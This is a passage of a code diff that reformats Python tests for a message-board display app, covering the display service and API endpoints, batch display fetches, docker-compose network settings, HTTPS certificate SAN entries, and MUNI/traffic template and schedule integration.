         mock_plugin_registry.get_plugin.return_value = None
-        
+
         result = service.get_display("invalid_type")
-        
+
         assert result.available is False
         assert "Unknown display type" in result.error
-    
+
     def test_get_display_success(self, service, mock_plugin_registry):
         """Test successful display fetch via plugin system."""
         from src.plugins.base import PluginResult
-        
+
         mock_plugin_result = PluginResult(
-            available=True,
-            data={"temperature": 72, "condition": "Sunny"},
-            formatted_lines=["Sunny, 72F"]
+            available=True, data={"temperature": 72, "condition": "Sunny"}, formatted_lines=["Sunny, 72F"]
         )
         mock_plugin_registry.fetch_plugin_data.return_value = mock_plugin_result
-        
+
         result = service.get_display("weather")
-        
+
         assert result.display_type == "weather"
         assert result.available is True
         assert result.error is None
         assert "Sunny, 72F" in result.formatted
-    
+
     def test_get_display_plugin_disabled(self, service, mock_plugin_registry):
         """Test display fetch when plugin is disabled."""
         from src.plugins.base import PluginResult
-        
-        mock_plugin_result = PluginResult(
-            available=False,
-            error="Plugin not enabled: weather"
-        )
+
+        mock_plugin_result = PluginResult(available=False, error="Plugin not enabled: weather")
         mock_plugin_registry.fetch_plugin_data.return_value = mock_plugin_result
-        
+
         result = service.get_display("weather")
-        
+
         assert result.display_type == "weather"
         assert result.available is False
         assert "not enabled" in result.error
@@ -97,85 +95,74 @@ class TestDisplayService:
 
 class TestDisplayResult:
     """Tests for DisplayResult dataclass."""
-    
+
     def test_display_result_creation(self):
         """Test creating a DisplayResult."""
-        result = DisplayResult(
-            display_type="weather",
-            formatted="Sunny, 72F",
-            raw={"temp": 72},
-            available=True
-        )
-        
+        result = DisplayResult(display_type="weather", formatted="Sunny, 72F", raw={"temp": 72}, available=True)
+
         assert result.display_type == "weather"
         assert result.formatted == "Sunny, 72F"
         assert result.raw == {"temp": 72}
         assert result.available is True
         assert result.error is None
-    
+
     def test_display_result_with_error(self):
         """Test DisplayResult with error."""
         result = DisplayResult(
-            display_type="weather",
-            formatted="",
-            raw={},
-            available=False,
-            error="Source not configured"
+            display_type="weather", formatted="", raw={}, available=False, error="Source not configured"
         )
-        
+
         assert result.available is False
         assert result.error == "Source not configured"
 
 
 class TestDisplayAPIEndpoints:
     """Tests for display API endpoints."""
-    
+
     @pytest.fixture
     def client(self):
         """Create a test client."""
         from src.api_server import app
+
         return TestClient(app)
-    
+
     @pytest.fixture
     def mock_display_service(self):
         """Mock the display service."""
-        with patch('src.api_server.get_display_service') as mock:
+        with patch("src.api_server.get_display_service") as mock:
             mock_service = Mock()
             mock.return_value = mock_service
             yield mock_service
-    
+
     def test_list_displays(self, client, mock_display_service):
         """Test GET /displays endpoint."""
         mock_display_service.get_available_displays.return_value = [
             {"type": "weather", "available": True, "description": "Weather", "source": "plugin"},
             {"type": "date_time", "available": True, "description": "DateTime", "source": "plugin"},
         ]
-        
+
         response = client.get("/displays")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert "displays" in data
         assert data["total"] == 2
         assert data["available_count"] == 2
-    
+
     def test_get_display_success(self, client, mock_display_service):
         """Test GET /displays/{type} endpoint."""
         mock_display_service.get_display.return_value = DisplayResult(
-            display_type="weather",
-            formatted="Sunny, 72F\nSan Francisco",
-            raw={"temp": 72},
-            available=True
+            display_type="weather", formatted="Sunny, 72F\nSan Francisco", raw={"temp": 72}, available=True
         )
-        
+
         response = client.get("/displays/weather")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["display_type"] == "weather"
         assert data["message"] == "Sunny, 72F\nSan Francisco"
         assert len(data["lines"]) == 2
-    
+
     def test_get_display_invalid_type(self, client, mock_display_service):
         """Test GET /displays/{type} with invalid type."""
         mock_display_service.get_display.return_value = DisplayResult(
@@ -183,46 +170,42 @@ class TestDisplayAPIEndpoints:
             formatted="",
             raw={},
             available=False,
-            error="Unknown display type: invalid_type. Valid types: ['weather', 'datetime']"
+            error="Unknown display type: invalid_type. Valid types: ['weather', 'datetime']",
         )
-        
+
         response = client.get("/displays/invalid_type")
-        
+
         assert response.status_code == 400
         assert "Unknown display type" in response.json()["detail"]
-    
+
     def test_get_display_unavailable(self, client, mock_display_service):
         """Test GET /displays/{type} when source unavailable."""
         mock_display_service.get_display.return_value = DisplayResult(
-            display_type="home_assistant",
-            formatted="",
-            raw={},
-            available=False,
-            error="Home Assistant not configured"
+            display_type="home_assistant", formatted="", raw={}, available=False, error="Home Assistant not configured"
         )
-        
+
         response = client.get("/displays/home_assistant")
-        
+
         assert response.status_code == 503
         assert "not configured" in response.json()["detail"]
-    
+
     def test_get_display_raw(self, client, mock_display_service):
         """Test GET /displays/{type}/raw endpoint."""
         mock_display_service.get_display.return_value = DisplayResult(
             display_type="weather",
             formatted="Sunny",
             raw={"temperature": 72, "condition": "Sunny", "humidity": 45},
-            available=True
+            available=True,
         )
-        
+
         response = client.get("/displays/weather/raw")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["display_type"] == "weather"
         assert data["data"]["temperature"] == 72
         assert data["available"] is True
-    
+
     def test_get_display_raw_invalid_type(self, client, mock_display_service):
         """Test GET /displays/{type}/raw with invalid type returns 503."""
         mock_display_service.get_display.return_value = DisplayResult(
@@ -230,11 +213,11 @@ class TestDisplayAPIEndpoints:
             formatted="",
             raw={},
             available=False,
-            error="Unknown display type: invalid_type"
+            error="Unknown display type: invalid_type",
         )
-        
+
         response = client.get("/displays/invalid_type/raw")
-        
+
         # Raw endpoint returns 503 for any unavailable display
         assert response.status_code == 503
 
@@ -246,13 +229,14 @@ class TestDisplayServiceEdgeCases:
         """Test module-level ImportError handling for plugin system (lines 17-20)."""
         import importlib
         import sys
+
         import src.displays.service as svc
 
-        orig_plugins_module = sys.modules.get('src.plugins')
+        orig_plugins_module = sys.modules.get("src.plugins")
 
         try:
             # Setting a module to None in sys.modules causes ImportError on import
-            sys.modules['src.plugins'] = None
+            sys.modules["src.plugins"] = None
             importlib.reload(svc)
 
             assert svc.PLUGIN_SYSTEM_AVAILABLE is False
@@ -261,49 +245,53 @@ class TestDisplayServiceEdgeCases:
         finally:
             # Restore the plugins module and reload to reset state
             if orig_plugins_module is not None:
-                sys.modules['src.plugins'] = orig_plugins_module
+                sys.modules["src.plugins"] = orig_plugins_module
             else:
-                sys.modules.pop('src.plugins', None)
+                sys.modules.pop("src.plugins", None)
             importlib.reload(svc)
 
     def test_init_plugin_registry_init_exception(self):
         """Test __init__ when plugin registry raises during initialization (lines 56-58)."""
-        with patch('src.displays.service.PLUGIN_SYSTEM_AVAILABLE', True), \
-             patch('src.displays.service.get_plugin_registry') as mock_get:
+        with (
+            patch("src.displays.service.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.displays.service.get_plugin_registry") as mock_get,
+        ):
             mock_get.side_effect = Exception("Registry init failed")
             service = DisplayService()
             assert service._plugin_registry is None
 
     def test_init_plugin_system_unavailable(self):
         """Test __init__ when plugin system is not available (lines 59-60)."""
-        with patch('src.displays.service.PLUGIN_SYSTEM_AVAILABLE', False):
+        with patch("src.displays.service.PLUGIN_SYSTEM_AVAILABLE", False):
             service = DisplayService()
             assert service._plugin_registry is None
 
     def test_get_plugin_registry_returns_registry(self):
         """Test get_plugin_registry returns the registry when set (line 66)."""
         mock_registry = Mock()
-        with patch('src.displays.service.PLUGIN_SYSTEM_AVAILABLE', True), \
-             patch('src.displays.service.get_plugin_registry') as mock_get:
+        with (
+            patch("src.displays.service.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.displays.service.get_plugin_registry") as mock_get,
+        ):
             mock_get.return_value = mock_registry
             service = DisplayService()
             assert service.get_plugin_registry() is mock_registry
 
     def test_get_plugin_registry_returns_none_when_unavailable(self):
         """Test get_plugin_registry returns None when no registry (line 66)."""
-        with patch('src.displays.service.PLUGIN_SYSTEM_AVAILABLE', False):
+        with patch("src.displays.service.PLUGIN_SYSTEM_AVAILABLE", False):
             service = DisplayService()
             assert service.get_plugin_registry() is None
 
     def test_get_available_displays_no_registry(self):
         """Test get_available_displays returns empty list when no registry (line 79)."""
-        with patch('src.displays.service.PLUGIN_SYSTEM_AVAILABLE', False):
+        with patch("src.displays.service.PLUGIN_SYSTEM_AVAILABLE", False):
             service = DisplayService()
             assert service.get_available_displays() == []
 
     def test_get_display_no_registry(self):
         """Test get_display returns error result when no registry (lines 102-108)."""
-        with patch('src.displays.service.PLUGIN_SYSTEM_AVAILABLE', False):
+        with patch("src.displays.service.PLUGIN_SYSTEM_AVAILABLE", False):
             service = DisplayService()
             result = service.get_display("weather")
             assert result.available is False
@@ -318,8 +306,10 @@ class TestDisplayServiceEdgeCases:
         mock_registry.get_plugin.return_value = Mock()
         mock_registry.fetch_plugin_data.side_effect = RuntimeError("Connection timeout")
 
-        with patch('src.displays.service.PLUGIN_SYSTEM_AVAILABLE', True), \
-             patch('src.displays.service.get_plugin_registry') as mock_get:
+        with (
+            patch("src.displays.service.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.displays.service.get_plugin_registry") as mock_get,
+        ):
             mock_get.return_value = mock_registry
             service = DisplayService()
             result = service.get_display("weather")
@@ -335,8 +325,8 @@ class TestResetDisplayService:
 
     def test_reset_when_no_instance(self):
         """Test reset_display_service when no instance exists (lines 177-178)."""
-        from src.displays.service import reset_display_service
         import src.displays.service as svc
+        from src.displays.service import reset_display_service
 
         original = svc._display_service
         try:

--- a/tests/test_displays_batch.py
+++ b/tests/test_displays_batch.py
@@ -1,5 +1,7 @@
 """Tests for batch display endpoints."""
+
 from fastapi.testclient import TestClient
+
 from src.api_server import app
 
 client = TestClient(app)
@@ -7,22 +9,16 @@ client = TestClient(app)
 
 def test_displays_raw_batch_success():
     """Test successful batch display fetch."""
-    response = client.post(
-        "/displays/raw/batch",
-        json={
-            "display_types": ["date_time"],
-            "enabled_only": False
-        }
-    )
-    
+    response = client.post("/displays/raw/batch", json={"display_types": ["date_time"], "enabled_only": False})
+
     assert response.status_code == 200
     data = response.json()
-    
+
     assert "displays" in data
     assert "total" in data
     assert "successful" in data
     assert data["total"] == 1
-    
+
     # Check date_time display is in results
     assert "date_time" in data["displays"]
     display = data["displays"]["date_time"]
@@ -34,19 +30,15 @@ def test_displays_raw_batch_success():
 def test_displays_raw_batch_multiple_plugins():
     """Test batch fetch with multiple plugins."""
     response = client.post(
-        "/displays/raw/batch",
-        json={
-            "display_types": ["date_time", "weather", "stocks"],
-            "enabled_only": False
-        }
+        "/displays/raw/batch", json={"display_types": ["date_time", "weather", "stocks"], "enabled_only": False}
     )
-    
+
     assert response.status_code == 200
     data = response.json()
-    
+
     assert data["total"] == 3
     assert "date_time" in data["displays"]
-    
+
     # Other plugins may or may not be available depending on configuration
     # but should be in the response
     for plugin_id in ["date_time", "weather", "stocks"]:
@@ -56,21 +48,17 @@ def test_displays_raw_batch_multiple_plugins():
 def test_displays_raw_batch_enabled_only():
     """Test batch fetch with enabled_only filter."""
     response = client.post(
-        "/displays/raw/batch",
-        json={
-            "display_types": ["date_time", "weather", "stocks", "muni"],
-            "enabled_only": True
-        }
+        "/displays/raw/batch", json={"display_types": ["date_time", "weather", "stocks", "muni"], "enabled_only": True}
     )
-    
+
     assert response.status_code == 200
     data = response.json()
-    
+
     # enabled_only filters out non-available plugins
     # All returned displays should be available
-    for display_id, display in data["displays"].items():
+    for _display_id, display in data["displays"].items():
         assert display["available"] is True
-    
+
     # Total requested may be more than returned
     assert data["total"] == 4
     assert data["successful"] == len(data["displays"])
@@ -78,24 +66,16 @@ def test_displays_raw_batch_enabled_only():
 
 def test_displays_raw_batch_no_display_types():
     """Test batch endpoint with missing display_types."""
-    response = client.post(
-        "/displays/raw/batch",
-        json={}
-    )
-    
+    response = client.post("/displays/raw/batch", json={})
+
     assert response.status_code == 400
     assert "display_types parameter required" in response.json()["detail"]
 
 
 def test_displays_raw_batch_invalid_display_types():
     """Test batch endpoint with invalid display_types format."""
-    response = client.post(
-        "/displays/raw/batch",
-        json={
-            "display_types": "not_a_list"
-        }
-    )
-    
+    response = client.post("/displays/raw/batch", json={"display_types": "not_a_list"})
+
     assert response.status_code == 400
     assert "display_types must be a list" in response.json()["detail"]
 
@@ -104,61 +84,47 @@ def test_displays_raw_batch_partial_failure():
     """Test batch fetch with some invalid plugins."""
     response = client.post(
         "/displays/raw/batch",
-        json={
-            "display_types": ["date_time", "invalid_plugin_xyz", "another_fake"],
-            "enabled_only": False
-        }
+        json={"display_types": ["date_time", "invalid_plugin_xyz", "another_fake"], "enabled_only": False},
     )
-    
+
     assert response.status_code == 200
     data = response.json()
-    
+
     # All requested plugins should be in results
     assert "date_time" in data["displays"]
     assert "invalid_plugin_xyz" in data["displays"]
     assert "another_fake" in data["displays"]
-    
+
     # Invalid plugins should not be available
     assert data["displays"]["invalid_plugin_xyz"]["available"] is False
     assert data["displays"]["another_fake"]["available"] is False
-    
+
     # Total requested should match
     assert data["total"] == 3
 
 
 def test_displays_raw_batch_empty_list():
     """Test batch endpoint with empty display_types list."""
-    response = client.post(
-        "/displays/raw/batch",
-        json={
-            "display_types": []
-        }
-    )
-    
+    response = client.post("/displays/raw/batch", json={"display_types": []})
+
     # Should return 400 since no display_types provided
     assert response.status_code == 400
 
 
 def test_displays_raw_batch_data_structure():
     """Test that batch response has correct data structure."""
-    response = client.post(
-        "/displays/raw/batch",
-        json={
-            "display_types": ["date_time"],
-            "enabled_only": False
-        }
-    )
-    
+    response = client.post("/displays/raw/batch", json={"display_types": ["date_time"], "enabled_only": False})
+
     assert response.status_code == 200
     data = response.json()
-    
+
     # Verify overall structure
     assert isinstance(data["displays"], dict)
     assert isinstance(data["total"], int)
     assert isinstance(data["successful"], int)
-    
+
     # Verify individual display structure
-    for display_id, display in data["displays"].items():
+    for _display_id, display in data["displays"].items():
         assert "data" in display
         assert "available" in display
         assert "error" in display
@@ -169,17 +135,12 @@ def test_displays_raw_batch_data_structure():
 
 def test_displays_raw_batch_default_enabled_only():
     """Test that enabled_only defaults to True."""
-    response = client.post(
-        "/displays/raw/batch",
-        json={
-            "display_types": ["date_time"]
-        }
-    )
-    
+    response = client.post("/displays/raw/batch", json={"display_types": ["date_time"]})
+
     assert response.status_code == 200
     data = response.json()
-    
+
     # Should only return enabled plugins by default
     # All returned plugins should be available
-    for display_id, display in data["displays"].items():
+    for _display_id, display in data["displays"].items():
         assert display["available"] is True

--- a/tests/test_docker_compose.py
+++ b/tests/test_docker_compose.py
@@ -26,6 +26,7 @@ def _load_compose(filename: str) -> dict:
 # docker-compose.dev.yml
 # ---------------------------------------------------------------------------
 
+
 class TestDevComposeNetwork:
     """Validate that docker-compose.dev.yml uses explicit networks."""
 
@@ -48,18 +49,14 @@ class TestDevComposeNetwork:
 
         for name, svc in services.items():
             svc_nets = svc.get("networks", [])
-            assert shared_net in svc_nets, (
-                f"Service '{name}' is missing network '{shared_net}'"
-            )
+            assert shared_net in svc_nets, f"Service '{name}' is missing network '{shared_net}'"
 
     def test_mock_board_on_same_network_as_app(self):
         """The mock board must be on the same network as the main app."""
         services = self.compose.get("services", {})
         app_nets = set(services.get("fiestaboard", {}).get("networks", []))
         mock_nets = set(services.get("fiestaboard-mock-board", {}).get("networks", []))
-        assert app_nets & mock_nets, (
-            "fiestaboard and fiestaboard-mock-board must share at least one network"
-        )
+        assert app_nets & mock_nets, "fiestaboard and fiestaboard-mock-board must share at least one network"
 
     def test_network_driver_is_bridge(self):
         """The defined network should use the bridge driver."""
@@ -71,6 +68,7 @@ class TestDevComposeNetwork:
 # ---------------------------------------------------------------------------
 # docker-compose.yml (production)
 # ---------------------------------------------------------------------------
+
 
 class TestProdCompose:
     """Validate docker-compose.yml (production) settings."""
@@ -100,6 +98,7 @@ class TestProdCompose:
 # docker-compose.hub.yml
 # ---------------------------------------------------------------------------
 
+
 class TestHubCompose:
     """Validate docker-compose.hub.yml settings."""
 
@@ -119,6 +118,7 @@ class TestHubCompose:
 # ---------------------------------------------------------------------------
 # docker-compose.prod.yml
 # ---------------------------------------------------------------------------
+
 
 class TestProdPrebuiltCompose:
     """Validate docker-compose.prod.yml settings."""

--- a/tests/test_https_certs.py
+++ b/tests/test_https_certs.py
@@ -12,15 +12,12 @@ import pytest
 
 from src.system import https_certs
 
-
 # ---------------------------------------------------------------------------
 # Helpers
 # ---------------------------------------------------------------------------
 
 OPENSSL_AVAILABLE = shutil.which("openssl") is not None
-requires_openssl = pytest.mark.skipif(
-    not OPENSSL_AVAILABLE, reason="openssl CLI not available"
-)
+requires_openssl = pytest.mark.skipif(not OPENSSL_AVAILABLE, reason="openssl CLI not available")
 
 
 @pytest.fixture
@@ -76,9 +73,7 @@ class TestBuildSanEntries:
         assert "IP:127.0.0.1" in sans
 
     def test_extra_hosts_dns_vs_ip_classification(self):
-        sans = https_certs._build_san_entries(
-            extra_hosts=["192.168.1.50", "myhost.example.com"]
-        )
+        sans = https_certs._build_san_entries(extra_hosts=["192.168.1.50", "myhost.example.com"])
         assert "IP:192.168.1.50" in sans
         assert "DNS:myhost.example.com" in sans
 
@@ -155,9 +150,7 @@ class TestGenerateCert:
         monkeypatch.setattr(https_certs, "_openssl_available", lambda: True)
 
         def fake_run(*args, **kwargs):
-            raise subprocess.CalledProcessError(
-                returncode=1, cmd=args[0], stderr="boom"
-            )
+            raise subprocess.CalledProcessError(returncode=1, cmd=args[0], stderr="boom")
 
         monkeypatch.setattr(subprocess, "run", fake_run)
         with pytest.raises(RuntimeError, match="openssl failed"):

--- a/tests/test_integration_multi_features.py
+++ b/tests/test_integration_multi_features.py
@@ -1,28 +1,30 @@
 """Integration tests for multi-stop/route features."""
 
-import pytest
 import tempfile
+from datetime import UTC, datetime
 from pathlib import Path
-from datetime import datetime, timezone
 from unittest.mock import Mock, patch
-from src.templates.engine import TemplateEngine
+
+import pytest
+
 from src.main import DisplayService
+from src.pages.models import PageCreate
+from src.pages.service import PageService
+from src.pages.storage import PageStorage
 from src.schedules.models import ScheduleCreate
 from src.schedules.service import ScheduleService
 from src.schedules.storage import ScheduleStorage
 from src.settings.service import SettingsService
-from src.pages.models import PageCreate
-from src.pages.service import PageService
-from src.pages.storage import PageStorage
+from src.templates.engine import TemplateEngine
 
 
 class TestMuniIntegration:
     """Test MUNI multi-stop template integration."""
-    
+
     def test_muni_indexed_variables(self):
         """Test that indexed MUNI variables work in templates."""
         engine = TemplateEngine()
-        
+
         # Mock context with multiple stops
         context = {
             "muni": {
@@ -32,65 +34,55 @@ class TestMuniIntegration:
                         "line": "N-JUDAH",
                         "stop_name": "Church & Duboce",
                         "formatted": "N: 3, 8, 15 min",
-                        "is_delayed": False
+                        "is_delayed": False,
                     },
                     {
                         "stop_code": "15727",
                         "line": "J-CHURCH",
                         "stop_name": "Market & Church",
                         "formatted": "J: 5, 12 min",
-                        "is_delayed": True
-                    }
+                        "is_delayed": True,
+                    },
                 ],
                 "stop_count": 2,
                 # Backward compatibility fields
                 "line": "N-JUDAH",
                 "stop_name": "Church & Duboce",
-                "formatted": "N: 3, 8, 15 min"
+                "formatted": "N: 3, 8, 15 min",
             }
         }
-        
+
         # Test indexed access
         result = engine.render("{{muni.stops.0.line}}", context)
         assert "N-JUDAH" in result
-        
+
         result = engine.render("{{muni.stops.1.line}}", context)
         assert "J-CHURCH" in result
-        
+
         # Test backward compatibility
         result = engine.render("{{muni.line}}", context)
         assert "N-JUDAH" in result
-        
+
         # Test stop count
         result = engine.render("{{muni.stop_count}}", context)
         assert "2" in result
-    
+
     def test_muni_multi_line_template(self):
         """Test rendering a multi-stop template."""
         engine = TemplateEngine()
-        
+
         context = {
             "muni": {
-                "stops": [
-                    {"line": "N", "formatted": "N: 3, 8 min"},
-                    {"line": "J", "formatted": "J: 5, 12 min"}
-                ],
-                "stop_count": 2
+                "stops": [{"line": "N", "formatted": "N: 3, 8 min"}, {"line": "J", "formatted": "J: 5, 12 min"}],
+                "stop_count": 2,
             }
         }
-        
-        template = [
-            "{center}MUNI ARRIVALS",
-            "{{muni.stops.0.formatted}}",
-            "{{muni.stops.1.formatted}}",
-            "",
-            "",
-            ""
-        ]
-        
+
+        template = ["{center}MUNI ARRIVALS", "{{muni.stops.0.formatted}}", "{{muni.stops.1.formatted}}", "", "", ""]
+
         result = engine.render_lines(template, context)
         # render_lines returns a string with 6 lines joined by newlines
-        lines = result.split('\n')
+        lines = result.split("\n")
         assert len(lines) == 6
         assert "MUNI ARRIVALS" in lines[0]
         assert "N: 3, 8 min" in lines[1]
@@ -99,11 +91,11 @@ class TestMuniIntegration:
 
 class TestTrafficIntegration:
     """Test Traffic multi-route template integration."""
-    
+
     def test_traffic_indexed_variables(self):
         """Test that indexed Traffic variables work in templates."""
         engine = TemplateEngine()
-        
+
         # Mock context with multiple routes
         context = {
             "traffic": {
@@ -115,7 +107,7 @@ class TestTrafficIntegration:
                         "duration_minutes": 25,
                         "delay_minutes": 5,
                         "traffic_status": "MODERATE",
-                        "formatted": "WORK: 25m (+5m)"
+                        "formatted": "WORK: 25m (+5m)",
                     },
                     {
                         "origin": "Home",
@@ -124,8 +116,8 @@ class TestTrafficIntegration:
                         "duration_minutes": 45,
                         "delay_minutes": 0,
                         "traffic_status": "LIGHT",
-                        "formatted": "AIRPORT: 45m"
-                    }
+                        "formatted": "AIRPORT: 45m",
+                    },
                 ],
                 "route_count": 2,
                 # Backward compatibility fields
@@ -133,51 +125,51 @@ class TestTrafficIntegration:
                 "delay_minutes": 5,
                 "traffic_status": "MODERATE",
                 "destination_name": "WORK",
-                "formatted": "WORK: 25m (+5m)"
+                "formatted": "WORK: 25m (+5m)",
             }
         }
-        
+
         # Test indexed access
         result = engine.render("{{traffic.routes.0.destination_name}}", context)
         assert "WORK" in result
-        
+
         result = engine.render("{{traffic.routes.1.destination_name}}", context)
         assert "AIRPORT" in result
-        
+
         # Test backward compatibility
         result = engine.render("{{traffic.destination_name}}", context)
         assert "WORK" in result
-        
+
         # Test route count
         result = engine.render("{{traffic.route_count}}", context)
         assert "2" in result
-    
+
     def test_traffic_multi_line_template(self):
         """Test rendering a multi-route template."""
         engine = TemplateEngine()
-        
+
         context = {
             "traffic": {
                 "routes": [
                     {"destination_name": "WORK", "duration_minutes": 25, "formatted": "WORK: 25m (+5m)"},
-                    {"destination_name": "AIRPORT", "duration_minutes": 45, "formatted": "AIRPORT: 45m"}
+                    {"destination_name": "AIRPORT", "duration_minutes": 45, "formatted": "AIRPORT: 45m"},
                 ],
-                "route_count": 2
+                "route_count": 2,
             }
         }
-        
+
         template = [
             "{center}COMMUTE TIMES",
             "{{traffic.routes.0.formatted}}",
             "{{traffic.routes.1.formatted}}",
             "",
             "",
-            ""
+            "",
         ]
-        
+
         result = engine.render_lines(template, context)
         # render_lines returns a string with 6 lines joined by newlines
-        lines = result.split('\n')
+        lines = result.split("\n")
         assert len(lines) == 6
         assert "COMMUTE TIMES" in lines[0]
         assert "WORK: 25m" in lines[1]
@@ -186,30 +178,30 @@ class TestTrafficIntegration:
 
 class TestBackwardCompatibility:
     """Test backward compatibility with old single-stop/route configs."""
-    
+
     def test_muni_single_stop_still_works(self):
         """Test that old single stop config still works in templates."""
         engine = TemplateEngine()
-        
+
         # Old format context (single stop at top level)
         context = {
             "muni": {
                 "line": "N-JUDAH",
                 "stop_name": "Church & Duboce",
                 "formatted": "N: 3, 8, 15 min",
-                "is_delayed": False
+                "is_delayed": False,
             }
         }
-        
+
         # Old template should still work
         result = engine.render("{{muni.line}}: {{muni.formatted}}", context)
         assert "N-JUDAH" in result
         assert "3, 8, 15 min" in result
-    
+
     def test_traffic_single_route_still_works(self):
         """Test that old single route config still works in templates."""
         engine = TemplateEngine()
-        
+
         # Old format context (single route at top level)
         context = {
             "traffic": {
@@ -217,10 +209,10 @@ class TestBackwardCompatibility:
                 "duration_minutes": 25,
                 "delay_minutes": 5,
                 "traffic_status": "MODERATE",
-                "formatted": "DOWNTOWN: 25m (+5m)"
+                "formatted": "DOWNTOWN: 25m (+5m)",
             }
         }
-        
+
         # Old template should still work
         result = engine.render("{{traffic.formatted}}", context)
         assert "DOWNTOWN: 25m" in result
@@ -228,272 +220,250 @@ class TestBackwardCompatibility:
 
 class TestScheduleModeIntegration:
     """Test schedule mode integration with DisplayService."""
-    
+
     @pytest.fixture
     def temp_files(self):
         """Create temporary storage files."""
-        pages_file = tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='_pages.json')
-        schedules_file = tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='_schedules.json')
-        settings_file = tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='_settings.json')
-        
-        pages_path = pages_file.name
-        schedules_path = schedules_file.name
-        settings_path = settings_file.name
-        
-        pages_file.close()
-        schedules_file.close()
-        settings_file.close()
-        
-        yield {
-            'pages': pages_path,
-            'schedules': schedules_path,
-            'settings': settings_path
-        }
-        
+        with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix="_pages.json") as pages_file:
+            pages_path = pages_file.name
+        with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix="_schedules.json") as schedules_file:
+            schedules_path = schedules_file.name
+        with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix="_settings.json") as settings_file:
+            settings_path = settings_file.name
+
+        yield {"pages": pages_path, "schedules": schedules_path, "settings": settings_path}
+
         # Cleanup
         Path(pages_path).unlink(missing_ok=True)
         Path(schedules_path).unlink(missing_ok=True)
         Path(settings_path).unlink(missing_ok=True)
-    
+
     @pytest.fixture
     def services(self, temp_files):
         """Create service instances with temporary storage."""
-        page_storage = PageStorage(storage_file=temp_files['pages'])
+        page_storage = PageStorage(storage_file=temp_files["pages"])
         page_service = PageService(storage=page_storage)
-        
-        schedule_storage = ScheduleStorage(storage_file=temp_files['schedules'])
+
+        schedule_storage = ScheduleStorage(storage_file=temp_files["schedules"])
         schedule_service = ScheduleService(storage=schedule_storage)
-        
-        settings_service = SettingsService(settings_file=temp_files['settings'])
-        
-        return {
-            'page': page_service,
-            'schedule': schedule_service,
-            'settings': settings_service
-        }
-    
+
+        settings_service = SettingsService(settings_file=temp_files["settings"])
+
+        return {"page": page_service, "schedule": schedule_service, "settings": settings_service}
+
     def test_manual_mode_uses_manual_active_page(self, services):
         """Test that manual mode uses the manual active page setting."""
-        page_service = services['page']
-        settings_service = services['settings']
-        
+        page_service = services["page"]
+        settings_service = services["settings"]
+
         # Create two pages
-        page1 = page_service.create_page(PageCreate(
-            name="Manual Page",
-            type="template",
-            template=["Manual Active Page", "", "", "", "", ""]
-        ))
-        page2 = page_service.create_page(PageCreate(
-            name="Scheduled Page",
-            type="template",
-            template=["This is scheduled", "", "", "", "", ""]
-        ))
-        
+        page1 = page_service.create_page(
+            PageCreate(name="Manual Page", type="template", template=["Manual Active Page", "", "", "", "", ""])
+        )
+        page_service.create_page(
+            PageCreate(name="Scheduled Page", type="template", template=["This is scheduled", "", "", "", "", ""])
+        )
+
         # Set manual active page
         settings_service.set_active_page_id(page1.id)
-        
+
         # Ensure schedule mode is disabled (default)
         assert not settings_service.is_schedule_enabled()
-        
+
         # Create a DisplayService instance with mocked board client
-        with patch('src.main.BoardClient') as mock_board_client:
+        with patch("src.main.BoardClient") as mock_board_client:
             mock_client_instance = Mock()
             mock_client_instance.read_current_message.return_value = None
             mock_client_instance.send_characters.return_value = (True, True)
             mock_board_client.return_value = mock_client_instance
-            
-            with patch('src.main.get_page_service', return_value=page_service):
-                with patch('src.main.get_settings_service', return_value=settings_service):
-                    with patch('src.main.get_schedule_service', return_value=services['schedule']):
+
+            with patch("src.main.get_page_service", return_value=page_service):
+                with patch("src.main.get_settings_service", return_value=settings_service):
+                    with patch("src.main.get_schedule_service", return_value=services["schedule"]):
                         service = DisplayService()
                         service.vb_client = mock_client_instance
-                        
+
                         # Check active page (should use manual page1)
-                        result = service.check_and_send_active_page()
-                        
+                        service.check_and_send_active_page()
+
                         # Verify it used page1 (manual), not page2
                         assert service._last_active_page_id == page1.id
-    
+
     def test_schedule_mode_uses_scheduled_page(self, services):
         """Test that schedule mode uses the schedule-based page selection."""
-        page_service = services['page']
-        schedule_service = services['schedule']
-        settings_service = services['settings']
-        
+        page_service = services["page"]
+        schedule_service = services["schedule"]
+        settings_service = services["settings"]
+
         # Create two pages
-        page1 = page_service.create_page(PageCreate(
-            name="Manual Page",
-            type="template",
-            template=["Manual Active Page", "", "", "", "", ""]
-        ))
-        page2 = page_service.create_page(PageCreate(
-            name="Scheduled Page",
-            type="template",
-            template=["This is scheduled", "", "", "", "", ""]
-        ))
-        
+        page1 = page_service.create_page(
+            PageCreate(name="Manual Page", type="template", template=["Manual Active Page", "", "", "", "", ""])
+        )
+        page2 = page_service.create_page(
+            PageCreate(name="Scheduled Page", type="template", template=["This is scheduled", "", "", "", "", ""])
+        )
+
         # Set manual active page to page1
         settings_service.set_active_page_id(page1.id)
-        
+
         # Create a schedule for page2 (Monday 9am-5pm)
-        schedule_service.create_schedule(ScheduleCreate(
-            page_id=page2.id,
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="custom",
-            custom_days=["monday"],
-            enabled=True
-        ))
-        
+        schedule_service.create_schedule(
+            ScheduleCreate(
+                page_id=page2.id,
+                start_time="09:00",
+                end_time="17:00",
+                day_pattern="custom",
+                custom_days=["monday"],
+                enabled=True,
+            )
+        )
+
         # Enable schedule mode
         settings_service.set_schedule_enabled(True)
-        
+
         # Create a DisplayService instance with mocked board client
-        with patch('src.main.BoardClient') as mock_board_client:
+        with patch("src.main.BoardClient") as mock_board_client:
             mock_client_instance = Mock()
             mock_client_instance.read_current_message.return_value = None
             mock_client_instance.send_characters.return_value = (True, True)
             mock_board_client.return_value = mock_client_instance
-            
-            with patch('src.main.get_page_service', return_value=page_service):
-                with patch('src.main.get_settings_service', return_value=settings_service):
-                    with patch('src.main.get_schedule_service', return_value=schedule_service):
-                        with patch('src.schedules.service.get_settings_service', return_value=settings_service):
+
